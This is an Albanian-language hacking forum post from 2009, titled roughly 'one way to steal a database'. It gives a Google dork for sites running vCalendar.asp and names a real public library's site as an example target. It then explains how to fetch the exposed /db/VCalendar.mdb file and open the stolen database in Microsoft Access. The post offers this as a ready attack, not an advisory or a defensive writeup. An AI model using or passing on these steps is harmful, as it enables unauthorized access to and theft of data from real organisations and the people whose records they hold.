...:::Mesohu-Ks:::...
Pershendetje vizitor i nderuar...
Me sa duket, ju nuk jeni identifikuar akoma ne faqen tone, ndaj po ju paraqitet ky mesazh per tju kujtuar se ju mund te identifikoheni qe te merrni pjese ne
diskutimet dhe temat e shumta te forumit tone.

- Ne qofte se ende nuk keni nje Llogari personale ne forumin ton, mund ta hapni nje te tille duke u Regjistruar
-Regjistrimi eshte falas dhe ju merr koh maksimumi 1 min...

-Gjithsesi ju falenderojme shume, per kohen qe fute ne dispozicionper te n'a vizituar ne faqen tone.

Me Respekt dhe Kenaqesi:
Staffi i Forumit : Mesohu-ks

...:::Mesohu-Ks:::...

...:::Mesohu-Ks:::...
 
ForumPortalPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 1 Menyr me vjedh Databaze ( vCalendar.asp)

Shko poshtë 
AutoriMesazh
lumi-g
Administrator
Administrator
avatar

Numri i postimeve : 457
Join date : 26/04/2009
Age : 23

MesazhTitulli: 1 Menyr me vjedh Databaze ( vCalendar.asp)   Tue Jul 07, 2009 11:17 pm

google.com

Dork : "inurl:vcalendar_asp"

www.wilmington.lib.oh.us/vcalendar_asp/

Ja shlyjm vcalendar_asp

ja shtojm kete

/db/VCalendar.mdb

dhe na qet me ru databasen e marrim dhe database hapet me

Microsoft Office Acces

met mira besoj qe e kuptuhet
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit
 
1 Menyr me vjedh Databaze ( vCalendar.asp)
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
...:::Mesohu-Ks:::... :: Mesohu-ks Boxi :: Tutorials & Mesime-
Kërce tek: